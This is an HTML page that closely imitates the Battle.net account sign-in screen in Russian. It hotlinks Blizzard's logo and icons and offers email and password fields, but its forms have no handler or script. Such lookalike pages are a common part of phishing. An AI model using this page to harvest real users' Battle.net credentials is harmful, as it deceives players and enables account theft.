<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Battle.net</title>

    <style>
        body {
            background: #1c1e26;
            font-family: "Object Sans", "Arial", "Helvetica", "Segoe UI Symbol", "Segoe MDL2 Assets", sans-serif;
            font-size: 16px;
            line-height: 24px;
        }

        main {
            display: flex;
            flex-direction: column;      
            position: relative;
            width: 416px;
            margin: 0 auto 25px;
        }

        .links {
            font-weight: 400;
            color: rgba(255, 255, 255, 0.7);
            text-decoration: none;
            font-size: 11px;
            text-align: center;
        }

        .footer_desctop {
            width: 600px;
            min-width: auto;
            margin: 0 auto;
            font-size: 14px;
            line-height: 21px;
        }

        .footer_text {
            padding: 8px 0;
            color: rgba(255, 255, 255, 0.3);
            font-size: 11px;
        }

        span {
            color: rgba(255, 255, 255, 0.3);
            margin: 0 5px 0 5px;
        }

        .box {
            margin-top: 20%;
            position: relative;
            width: 100%;
            padding: 24px 0;
            background: none;
            border: none;
            box-sizing: border-box;
            min-height: 100%;
            margin-bottom: 50%;
        }

        .logo {
            background-image: url(https://bnetaccount.akamaized.net/login/static/images/toolkit/defaults/logos/bnet/logo-horizontal-color-light.1z1fI.svg);
            margin: 50px auto 38px auto;
            background-size: contain;
            background-position: center;
            background-repeat: no-repeat;
            width: 240px;
            height: 72px;
        }

        .input {
            min-width: 290px;
            max-width: 500px;
        }

        .login_header {
            font-weight: 700;
            font-size: 32px;
            line-height: 36px;
            margin: 40px 0px;
            text-align: center;
            color: #ffffff;
        }

        .block_line {
            margin: 40px 0 24px 0;
            font-style: normal;
            font-weight: 700;
            font-size: 14px;
            font-family: "Noto Sans", "Object Sans", sans-serif;
            line-height: 21px;
            text-align: center;
            color: #ffffff;
            text-transform: none;
            overflow: hidden;
            white-space: nowrap;
        }

        .control_group {
            margin: 0 auto 11px;
        }

        .input_block {
            display: inline-block;
            vertical-align: middle;
            height: 40px;
            padding: 0 12px;
            margin-top: 3px;
            margin-bottom: 3px;
            font-size: 16px;
            line-height: 24px;
            border: 1px solid rgba(255, 255, 255, 0.36);
            background-color: #171920;
            color: #ffffff;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            border-radius: 4px;
            width: 100%;
        }


        .btn_primary {
            background-color: #0074e0;
            color: #ffffff;
            border: 2px solid transparent;
            font-weight: 500;
            border-radius: 4px;
            margin: 3px 0;
            padding: 0 20px;
            font-size: 16px;
            line-height: 20px;
            min-height: 40px;
            width: 100%;
        }

        .login_btn {
            text-align: center;
            margin-top: 35px;
        }

        .help_links {
            list-style-type: none;
            text-align: center;
            margin: 48px 0 0 0;
            font-size: 16px;
            line-height: 24px; 
            margin-bottom: 24px;    
        }

        li {
            line-height: 24px;
            margin: 0 0 24.75px 0;
            padding-left: 10px;
        }

        .help_link {
            color: #148eff;
            text-decoration: none;
            text-underline-position: under;
            font-size: large;
        }

        i {
            position: absolute;
            left: 50%;
            top: 50%;
            transform: translate(-50%, -50%);
            margin: 0;
        }

        .icons_social_block {
            display: flex;
            flex-flow: row wrap;
            justify-content: center;
            align-items: center;
            margin: 0 40px;
        }

        .icon_form {
            display: block;
        }

        .social_icon {
            position: relative;
            width: 48px;
            height: 48px;
            padding: 13px;
            border-radius: 4px;
            margin: 12px;
            border: none;
        }

        .icon-google {
            background: url(https://bnetaccount.akamaized.net/login/static/images/login/social/google-logo-color.svg) no-repeat 0 0;
            opacity: 1;
            height: 18px;
            width: 17px;
        }

        .facebook {
            background-color: #1877F2;
        }

        .icon-facebook {
            background: url(https://bnetaccount.akamaized.net/login/static/images/login/social/facebook-logo-white.svg) no-repeat 0 0;
            opacity: 1;
            height: 18px;
            width: 18px;
        }

        .icon-apple {
            background: url(https://bnetaccount.akamaized.net/login/static/images/login/social/apple-logo-black.svg) no-repeat 0 0;
            opacity: 1;
            height: 19px;
            width: 15px;
        }

        .icons_stores_block {
            display: flex;
            flex-flow: row wrap;
            justify-content: center;
            align-items: center;
            margin: 0 40px;
        }
        
        .games_icon {
            position: relative;
            width: 48px;
            height: 48px;
            padding: 13px;
            border-radius: 4px;
            margin: 12px;
            border: none;
        }

        .xbox {
            background-color: #107c10;
        }

        .icon-xbox {
            background: url(https://bnetaccount.akamaized.net/login/static/images/login/social/xbox-logo-white.svg) no-repeat 0 0;
            opacity: 1;
            height: 16px;
            width: 16px;
        }

        .ps {
            background-color: #0070CC;
        }

        .icon-ps {
            background: url(https://bnetaccount.akamaized.net/login/static/images/login/social/playstation-logo-white.svg) no-repeat 0 0;
            opacity: 1;
            height: 15px;
            width: 21px;
        }

        .nd {
            background-color: #e60012;
        }   

        .icon-nd {
            background: url(https://bnetaccount.akamaized.net/login/static/images/login/social/switch-logo-white.svg) no-repeat 0 0;
            opacity: 1;
            height: 16px;
            width: 16px;
        }

        .steam {
            background-color: #FFF;
        }

        .icon-steam {
            background: url(https://bnetaccount.akamaized.net/login/static/images/login/social/steam-logo-black.svg) no-repeat 0 0;
            opacity: 1;
            height: 16px;
            width: 16px;
        }

    </style>
</head>
<body>
    <div class="container">
        <main>
            <div class="box">
                <h1 class="logo"></h1>
                <div class="input">
                    <h3 class="login_header">Авторизоваться</h3>
                </div>

                <div class="icons_social_block">
                    <form class="icon_form">
                        <button class="social_icon google">
                            <i class="icon-google"></i>
                        </button>
                    </form>
                    <form class="icon_form">
                        <button class="social_icon facebook">
                            <i class="icon-facebook"></i>
                        </button>
                    </form>
                    <form class="icon_form">
                        <button class="social_icon apple">
                            <i class="icon-apple"></i>
                        </button>
                    </form>
                </div>

                <div class="icons_stores_block">
                    <form class="icon_form">
                        <button class="games_icon xbox">
                            <i class="icon-xbox"></i>
                        </button>
                    </form>
                    <form class="icon_form">
                        <button class="games_icon ps">
                            <i class="icon-ps"></i>
                        </button>
                    </form>
                    <form class="icon_form">
                        <button class="games_icon nd">
                            <i class="icon-nd"></i>
                        </button>
                    </form>
                    <form class="icon_form">
                        <button class="games_icon steam">
                            <i class="icon-steam"></i>
                        </button>
                    </form>

                </div>

                <div class="block_line">
                    <span>
                        или войти через
                    </span>
                </div>

                <form class="login_input">
                    <div class="login_input_container">
                        <div class="control_group">
                            <input class="input_block" aria-label="Поле электронной почты или телефона. Введите электронный адрес или телефонный номер." name="accountName" title="Электронная почта или телефон" maxlength="320" type="text" tabindex="0" placeholder="Электронная почта или телефон" autocorrect="off" spellcheck="false">
                        </div>
                        <div class="control_group">
                           <input class="input_block" aria-label="Поле пароля. Введите пароль." name="password" title="Пароль" maxlength="128" type="password" tabindex="0" autocomplete="off" placeholder="Пароль" autocorrect="off" spellcheck="false">
                        </div>
                    </div>
                    <div class="login_btn">
                        <button class="btn_primary">
                            Авторизоваться
                        </button>
                    </div>
                </form>

                <ul class="help_links">
                    <li role="link">
                        <a class="help_link" href="https://account.battle.net/creation/?theme=bnet-next&flowTrackingId=11…9cb0e&bdp=22d8602875da5330002a02f8dbdb12e1e7d9b5ad754cd5f7e4b7c558ee760546" tabindex="0" id="signup" role="button"> Зарегистрируйте учетную запись Battle.net бесплатно </a>
                    </li>
                    <li role="link">
                        <a class="help_link" target="_blank" href="https://account.battle.net/recovery/?theme=bnet-next&flowTrackingId=11b8238a-66c4-43eb-aad2-06272159cb0e" tabindex="0" id="loginSupport" role="button">
                            Вы не можете войти?
                        </a>
                    </li>
                </ul>
            </div>
        </main>
        <footer>
            <div class="footer_desctop">
                <center>
                    <div class="footer_links">
                        <a class="links" href="https://www.blizzard.com/company/legal/eula">ПОЛЬЗОВАТЕЛЬСКОЕ СОГЛАШЕНИЕ BLIZZARD</a>
                        <span>|</span>
                        <a class="links" href="https://www.blizzard.com/company/about/privacy.html">ПОЛИТИКА КОНФИДЕНЦИАЛЬНОСТИ</a>
                        <span>|</span>
                        <a class="links" href="https://www.blizzard.com/company/legal/">УСЛОВИЯ</a>
                        <span>|</span>
                        <a class="links" href="https://eu.blizzard.com/company/about/infringementnotice.html">АВТОРСКОЕ ПРАВО</a>
                        <span>|</span>
                        <a class="links" href="https://eu.account.battle.net/login/cookies">ФАЙЛЫ COOKIE</a>
                        <span>|</span>
                        <a class="links" href="https://eu.account.battle.net/login/cookies#settings">ПАРАМЕТРЫ COOKIE</a>
                    </div>
                    <p class="footer_text">© BLIZZARD ENTERTAINMENT, INC., 2023</p>
                </center>
            </div>
        </footer>
    </div>
</body>
</html>